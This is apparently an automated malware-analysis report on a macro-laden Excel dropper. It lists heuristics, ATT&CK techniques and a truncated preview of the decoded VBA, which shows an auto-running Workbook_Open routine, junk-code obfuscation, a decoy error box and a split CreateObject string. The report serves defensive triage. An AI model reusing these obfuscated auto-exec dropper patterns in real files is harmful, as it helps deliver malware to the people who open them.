MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1071.001 Web Protocols
T1105 Ingress Tool Transfer
The file is an Excel document containing a Workbook_Open VBA macro. This macro utilizes the Shell() function and CreateObject, indicating an attempt to execute external code. The presence of obfuscated VBA code and the ClamAV detection name 'Doc.Dropper.Agent-6866901-0' strongly suggest this is a dropper malware designed to download and execute a secondary payload. The displayed message box is likely a decoy to mask the malicious activity.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-6866901-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6866901-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 15907 bytes |
SHA-256: 1f05064cad0fe72cae2443bd7f9dad3a8ac9703c25185ac3674a1c2c261d310d |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 6 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub workbook_open()
W_98SuVOM_qkKn8UpM.BRvz9_aLyD6iRde3pPcQ
While 13 = 5839
Dim PhUyQUMMnWbCsqrasWioj4sDixRfCYwb1 As String
Wend
Dim ALdHw_9kXgEN As Byte
While 14 = 1319
Dim uxINgEqJVVxQNbCpJNi_Knpd7ijdp8dJ7SCdVx1quprnXL3TARYI8ECEF As String
Wend
Dim oP8dKcW1mS As Byte
While 12 = 1644
Dim XhSVV1Md5BEtoObWgTL1P6Vpf3LhKT As String
Wend
Dim vt285a8CvE1gJ As Byte
While 18 = 6546
Dim heQNsEyfYbmbKlybnoRjNT2pT_XdgE9ruPGAj7x_dNTYSa As String
Wend
Dim OUMRaKNjzMmk As Byte
cV2IKFjOTfHz4 = MsgBox("Version not compatible", vbCritical, "Error")
While 20 = 2370
Dim rqS8Rb5p5dx2pzL___aU2tBPNnwcJY4V9CEWJPA7XuS1XZ As String
Wend
Dim tTBdzLKNB7nC As Byte
While 21 = 406
Dim smoZedjZ2mtx4r8d6EYJ1x4baoipJs_GsFgVQ8NyP8gEjLjFNqR5gbK5sK As String
Wend
Dim z43NGmkDwJk As Byte
While 8 = 2129
Dim K81j42Ox1M_bacZ_jO4km_8X4VrXa8Gw5ldSC6hRn4Suuaa As String
Wend
Dim uqhAx2h7F9bpg As Byte
While 5 = 4126
Dim IzU3_Pgx9EAmqk7rtKlb47q37S5UoVTjO_H As String
Wend
Dim xgZpc4mukfVEOk As Byte
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "W_98SuVOM_qkKn8UpM"
Dim wg_yILpXTbn6lu3KgyZNRgEIffpkVbyg1wWBKmHo56eMbACjP89aopkOZ5 As String
Dim iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7pVIJfPF As String
Dim YxcDCPpoV_B_TfqZrkMnURdbDwiAxuBONlwyOU6PDV_6l_IXYQvgkalFRA9Npozk8vzrs1IUo As Integer
Function NVvyMlKGa5tUJHkuYWpaGIReHgOJEUjLnsZ_gtBW7oEd5GrdHyF8(zAbLrWTXBmwJfC_nQj1QZnDTurdfSp1gztrlwSHu5fnXls4HNU6VrZmK6FZ_2x_TuNTuTWz8Z_V3_orAwUP7tdyXFfop2H2EaRlVXHx1d75lDsKPXXKffF)
While 25 = 8137
Dim v1Q3M4gxL8oOFnVLp_t2UJE6Kel6sK36m2JAsHSbJQ As String
Wend
Dim CQn157h7fd2Zh As Byte
While 23 = 1032
Dim jtTqqQj_ADslMbUbgpQpDFwQSjnWunWCKSjPWa As String
Wend
Dim lJjKBM5NqdLd9 As Byte
While 12 = 154
Dim xjsdb6CWElKRUpoZ31D_ECFE1DiU_3IJPnhabyGSSDfgW3pfNwwlGY3uclm As String
Wend
Dim WVqQLb_AqFL8Dst As Byte
iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7pVIJfPF = "MsXMl" & "2.dOMDOCumEnt"
While 10 = 7657
Dim tAfhq7WBEP_gC1tw8yKs6luRDW19YBys2Vn1N45o9 As String
Wend
Dim SjAF57I6RNH As Byte
While 7 = 125
Dim wFOLdSEXkDZTnoK3hC3ftlBsJHYpBFvp23hgjAYjhiqejvOQ7Bs As String
Wend
Dim JNTNJDfAT4XUd As Byte
While 6 = 6635
Dim PsbuEmQgmR7I4fGX2Gs9VkafmVcD9DpILLMzRdJStKg5V_PgWlbuoVGoP6F As String
Wend
Dim rILghkw6qQPE As Byte
Dim ItnO_XeMSXSr1PeKuUP5nuC9tnpoWZZOPP7C_lFWAhnR_Pr4QtvdYwOWpoeUqyz37DajRaJGM34EFt8b5vWlm5yc_iVTFupJruT6yGjzhmPf2HP5pBY5aLNAN7is_
Dim rDCiWbwL_yvnnMAxSsL5MJAr5dEsnseUB5jaoeg1HAx_K6czamHKnsKgCTm3VDgURYlrliHxKUvKV5f8_NP_iSqQrBWS1mcDbauuStM2dT9R7_JFxn2Gvgv9qT_iJx7g1qr4
While 20 = 2363
Dim V7YNIDeHhE6pUk5czDhiVWaHfm8SiGiNEf_xOF8juvhlMfJ7pR_lr As String
Wend
Dim qs9dOqeEKiYepi As Byte
While 1 = 5050
Dim yeEMsE7wiyx5_a_mPC6fWvER_YadhLGFf7TaiDU As String
Wend
Dim ft3HIpSqCEhQVh As Byte
While 14 = 467
Dim IJCYwMRmbMVpqWBFgCKpYucm5lorXX_4tgVuQBuzB3Qnvb85n6gdEoHWp As String
Wend
Dim YcJhjNDMa6HA As Byte
While 28 = 6825
Dim OxePUnfcxzbmsCazdxDX9_2gjQZmLZSfy4WGAMtAl41h_gxgv As String
Wend
Dim Lrm1tAJ57pCL2OW As Byte
While 10 = 8282
Dim e6wxnSxPCCu_MSgBb31_rpoD2LKDfpwtmcBDs92bWZ As String
Wend
Dim iw967kYmjS_Ooy As Byte
While 20 = 3031
Dim Ps5aGttVOAZtPbRc_XlPE1_6Oim3EcsWxKw9CZSlpLg8eKT7TFRk As String
Wend
Dim mWsXn9JgEzPuPB As Byte
Set rDCiWbwL_yvnnMAxSsL5MJAr5dEsnseUB5jaoeg1HAx_K6czamHKnsKgCTm3VDgURYlrliHxKUvKV5f8_NP_iSqQrBWS1mcDbauuStM2dT9R7_JFxn2Gvgv9qT_iJx7g1qr4 = CreateObject(iPX5nwqIEQLOapBTlnfYawhLTVTWPb6TiSrU8bc_HT1mXwQdMCug_EovrKiPbS3lT1pF7
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.